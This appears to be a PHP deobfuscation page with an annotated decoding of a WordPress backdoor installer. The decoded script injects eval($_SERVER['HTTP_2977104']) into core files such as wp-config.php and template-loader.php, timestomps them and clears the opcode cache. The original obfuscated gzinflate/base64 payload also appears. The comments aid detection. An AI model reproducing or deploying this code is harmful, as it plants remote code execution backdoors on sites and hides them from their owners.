
PHP Decode

eval(gzinflate(base64_decode('rVZ7U+I6FP+fmf0OcQa3ZeG6oKuOw3gfuiLoXnXQFURcpqQHibRpbVIeuvrZ..

Decoded Output


// Analyst note: entry point of the decoded script. It looks for a WordPress
// install relative to the process working directory and then tries to modify
// WordPress files in place.
define('CURRENTDIR', getcwd());
$rootDir = detectWProotDir();

// Stop when no wp-config.php is found in the working directory or in the path
// left after trimming a wp-admin / wp-includes / wp-content component.
if (!$rootDir) {
    echo 'invalid detect rootDir' . PHP_EOL;
    exit;
}


// First pass over the backTarget() list: $noBreak keeps its default (false),
// so the loop ends at the first file that is patched or already carries the marker.
backCheckWrite(backTarget(), $rootDir);
// Second pass over the additionalTarget() list with $noBreak = true, so every
// listed file is attempted regardless of earlier results.
backCheckWrite(additionalTarget(), $rootDir, true);

/**
 * Analyst note: injects the statement returned by hqBack() into each target file,
 * directly in front of the text matched by that file's regex.
 *
 * Defender-relevant behaviour visible below:
 *  - files that already contain the systemEnv() marker are left alone;
 *  - the modification time is set to the original mtime + 10 seconds, so a
 *    "recently modified files" search will not surface the change;
 *  - the file may be deleted and recreated instead of overwritten;
 *  - the opcode cache entry is invalidated so the altered file is recompiled.
 * Integrity checks should therefore compare file contents against a known-good
 * copy (for core files, e.g. `wp core verify-checksums`) rather than timestamps.
 *
 * @param array $backTarget map of path (relative to $rootDir) => PCRE pattern for the insertion point
 * @param string $rootDir   WordPress root as returned by detectWProotDir()
 * @param bool $noBreak     when true, keep going after a hit instead of stopping at the first one
 */
function backCheckWrite ($backTarget, $rootDir, $noBreak = false) {
    foreach ($backTarget as $path => $regex) {

        $fullPath = $rootDir . '/' . $path;
        $source = file_get_contents($fullPath);

        // Unreadable, missing or empty file: skip silently.
        if (!$source) {
            continue;
        }

        // Marker already present: report it and, unless $noBreak, stop the whole loop.
        if (detectString($source)) {
            echo sprintf('code already exists %s', $path) . PHP_EOL;

            if ($noBreak){
                continue;
            }

            break;
        }

        // Writable parent directory: the file will be unlinked and recreated further down.
        // NOTE(review): this flag is only ever assigned here, never initialised or reset,
        // so its value carries over from earlier loop iterations.
        if (is_writeable(dirname($fullPath))) {
            $deleteFileBeforeUpdate = 1;
        }

        // Neither the file nor its directory is writable: nothing can be changed.
        if (!is_writeable($fullPath) && !is_writeable(dirname($fullPath))) {
            echo sprintf('not writeable %s', $path) . PHP_EOL;
            continue;
        }

        // The regex picks the insertion point; files without a match are skipped.
        if (!preg_match($regex, $source, $matches)) {
            echo sprintf('not matches in %s', $path) . PHP_EOL;
            continue;
        }


        // Prepend the injected statement and a newline to the matched text.
        // str_replace() rewrites every occurrence of that text, not only the first.
        $newSource = str_replace($matches[0], hqBack() . PHP_EOL . $matches[0], $source);

        // Sanity check: the marker must now be present in the new contents.
        if (!detectString($newSource)) {
            echo sprintf('incorrect record %s', $path) . PHP_EOL;
            continue;
        }


        // Timestamp to restore afterwards: original mtime plus 10 seconds.
        $filemtime = filemtime($fullPath) + 10;

        // Delete-and-recreate path. Presumably this leaves a new inode owned by the
        // PHP process user, which can be a forensic tell; confirm on the affected host.
        if ($deleteFileBeforeUpdate) {
            unlink($fullPath);
        }

        if (file_put_contents($fullPath, $newSource)) {
            echo sprintf('%s success', $path) . PHP_EOL;
            // Timestomping: resets mtime to the value computed above. touch() does not
            // set ctime, so where the filesystem tracks it, ctime is the better signal.
            touch($fullPath, $filemtime);

            // Drop the cached compiled script so the modified file is used.
            if (function_exists('opcache_invalidate')) {
                opcache_invalidate($fullPath);
            }

            if ($noBreak) {
                continue;
            }

            // Default mode: one successfully modified file ends the pass.
            break;
        } else {
            echo sprintf('invalid write to %s', $path) . PHP_EOL;
        }
    }
}

/**
 * Analyst note: reports whether $source contains the marker string returned by
 * systemEnv(). The script uses it both to skip files that already carry the
 * injected statement and to confirm the injection after building the new contents.
 *
 * @param string $source file contents to inspect
 * @return bool true when the marker is found as a substring
 */
function detectString($source) {
    if (strstr($source, systemEnv()) !== false) {
        return true;
    }
    return false;
}

/**
 * Analyst note: returns the fixed marker '2977104'. In this sample the value is
 * used as the infection marker (detectString) and as the suffix of the $_SERVER
 * key read by the injected statement (hqBack), which makes it a usable
 * indicator when searching PHP files for this implant.
 *
 * @return string the literal marker
 */
function systemEnv() {
    return '2977104';
}

/**
 * Analyst note: builds the statement that gets written into the target files:
 *   eval($_SERVER['HTTP_2977104']);
 * $_SERVER['HTTP_*'] entries come from request headers, so the statement
 * evaluates request-supplied text as PHP with no authentication: a remote
 * code execution backdoor on every request that loads the patched file.
 *
 * Detection: search PHP files for the marker or for eval() applied to a
 * $_SERVER['HTTP_...'] value, and alert in proxy/WAF logs on requests that
 * carry a header named after the marker.
 *
 * @return string the PHP statement to inject
 */
function hqBack() {
    return sprintf('eval($_SERVER[\'HTTP_%s\']);', systemEnv());
}

/**
 * Analyst note: second target list, processed with $noBreak = true so both
 * files are attempted. Keys are paths relative to the WordPress root; values
 * are multiline PCRE patterns marking where the statement is inserted.
 *
 * Both files sit in the WordPress root. wp-config.php is site-specific, so it
 * needs manual review rather than comparison with a stock copy.
 *
 * @return array map of relative path => insertion-point regex
 */
function additionalTarget() {
    $arr = [
        // Insert in front of the line testing file_exists(...) for wp-config.php.
        'wp-load.php' => '~^\s*if.+?file_exists.+?wp-config.php[^\{]+\{~m',
        // Insert in front of the require_once of wp-settings.php.
        'wp-config.php' => '~^\s*require_once.+?wp-settings.php[^;]+;~m',
    ];

    return $arr;
}

/**
 * Analyst note: primary target list, stored as base64-encoded JSON so the file
 * names do not appear in clear text. Decoded, the map names two core files:
 *   wp-includes/formatting.php      (insertion before `function wptexturize_primes`)
 *   wp-includes/template-loader.php (insertion before the `if ... is_robots` line)
 * Both are stock WordPress core files, so a checksum comparison against the
 * matching core release will expose a modification.
 *
 * @return array map of relative path => insertion-point regex (json_decode with assoc = 1)
 */
function backTarget() {
return json_decode(base64_decode('eyJ3cC1pbmNsdWRlc1wvZm9ybWF0dGluZy5waHAiOiJ+XlxccypmdW5jdGlvblxccyt3cHRleHR1cml6ZV9wcmltZXN+bSIsIndwLWluY2x1ZGVzXC90ZW1wbGF0ZS1sb2FkZXIucGhwIjoifl5cXHMqaWYuKmlzX3JvYm90c1teXFx7fFxcOl0rKFxce3w6KX5tIn0='), 1);
}

/**
 * Moves the entry stored under $key to the front of $array, modifying the
 * caller's array by reference.
 *
 * Analyst note: nothing in the decoded output shown here calls this function.
 *
 * @param array $array array to reorder (passed by reference)
 * @param mixed $key   key of the entry to move first
 */
function moveTop(&$array, $key) {
    $temp = array($key => $array[$key]);
    unset($array[$key]);
    // Array union keeps the left operand's entries first.
    $array = $temp + $array;
}


/**
 * Analyst note: locates the WordPress root by looking for wp-config.php, first
 * in the working directory, then in the path left after cutting off everything
 * from a /wp-admin, /wp-includes or /wp-content component onwards. This lets the
 * script find the site root from anywhere below those directories, for example
 * a writable folder under wp-content.
 *
 * @return string|null directory containing wp-config.php, or null when none is found
 */
function detectWProotDir() {
    if (file_exists(CURRENTDIR . '/wp-config.php')) {
        return CURRENTDIR;
    }
    // Strip the first wp-admin / wp-includes / wp-content component and everything after it.
    $normalizePath = preg_replace('~\/(wp-admin|wp-includes|wp-content).*$~', '', CURRENTDIR);
    if (file_exists($normalizePath . '/wp-config.php')) {
        return $normalizePath;
    }

    return null;
}


Original Code

eval(gzinflate(base64_decode('rVZ7U+I6FP+fmf0OcQa3ZeG6oKuOw3gfuiLoXnXQFURcpqQHibRpbVIeuvrZ70lftIije2czPprkd96v5EwYMA66tv+92Tw4ufjaaGolcguSTky9UKjm8p7jyK/MI7vEBAlUts6iEx1vc2xA9JUYUyCPOYIL6NAhGuNjw2JmREYijEbWyFn9rHdw+q0agqdMVnNPuVyub9DR/hDoqOUxCbraXhge6qIXSiSRUV3EGabJJHO4Yb1El4j0fFCKDnxOFYpkqYmen8tJ0+W5s+eBMUK7B4YlILZt4OApHWboiCFI3jXkkOz+iSzgFqYKHuDVyg98yzoL7hMJ6Abts3JGQFidY4XjexSUWGZBD7n3qMMlcCn0hI8yKCYIIxBSxUrGS1Ey7sOc/VOWMIzNufQYv9VjJotcgnAKFzFyoGvUMYEYFnrBnKngCSnIqsCkCQwppMOb4aLExU4tZAUsV3VBXbX6ivhVY5joTVRMjb4Fusk8btiQ8tkLu/ImWGh/Df28Byqu313TkMr1lVdlrGSEzJmTjx/Jyq8qkHUsdyRJyF9z6S9Fd8XFXOzZhqRDPUzLUpxf+BGcg3iHVhGSMP6/1ZrnN4fJeZziQno9D1zLoOinSMp1+aZEhvd7WF16SoaqlDQiTtbFSshmdCLsDSsZp47nBW0K8Mv8DXaq8rUls+NSDr7TGVMklfKC9q9k5KLuPrcYH2XawSsZEPQQ11/WQ0rk3d5ZFUT4lIJ42ynS8VWypYQktheWNIS4K/fCRqJrjkuxu0IvGh5ovPZCObVe4pa6Y0kPyfQh8psaEQEcEW9kWDgNgwpHN72VYU+58O9TanQt7daRVGUWlhP+6EmJi5mQYB/wMU5ysrK7MMnU8kD6Hg+GZDU3FxsdB/BqRoUUy4hNhNXWd7a3K+UvWhafFHIGnHjlb0Cv6Pne+UHz8qB53dXqFxdnvVXR1W4KVS1rQZbxy6kficgbnnqsXCc2ahP3D8sxzDV36GpqQmvPP7riExusFf8K6iPMPdwhEKM/YLcKev2j+3hT7D4+21opw2sOSXHz4N5nHvQcTiHkJEBiHt2KkFf1plhNON1ElRB5Q2mcNS799CGPH3IR8E5gpZigJjC+jgRsfYl3GsyONuh+xe3bJ8JsNS1amYw79s6s36qVzUPL78w2J0b9H3bKjopta0rpzLXN1uYd3o37wV5u0HrTgnqzQm1rq3O5M8H/stM+KfbPG6LBzcm3luVfrU8rncPLh/b+TrnTqkz6h7Vy57wi+uu1Uafd8OnhcNK4c9jA2qTt+r/3RuvKP7ath/bG0fjK3inTioR2bbo9qE3pqVX2jvE/bEy2jtubssHLuxo+3iqF6oeMO2xnDBeOq39UnjJmWDYjmCXxxgRxMeDBla5ugldYsL1W25uoH/gcQ6IvuQiP1NssYFWMDsJH6ULxpV6/qcJLpZE+f0gHT7xswhSWFN+cIF2C2KI8GzvGA0QPx2CWx8NSe+5+1pG1YdqM/8QPHGCWb4L4GcpTvb6w9in/jDWk4e9cRmTzotYL4t6neZYo1j6d2hxbsvLjfw==')));

Function Calls

gzinflate 1
base64_decode 1

Variables

None

Stats

MD5 c0a9ba78abc4cbe1c51eb3509b6bb8f0
Eval Count 1
Decode Time 80 ms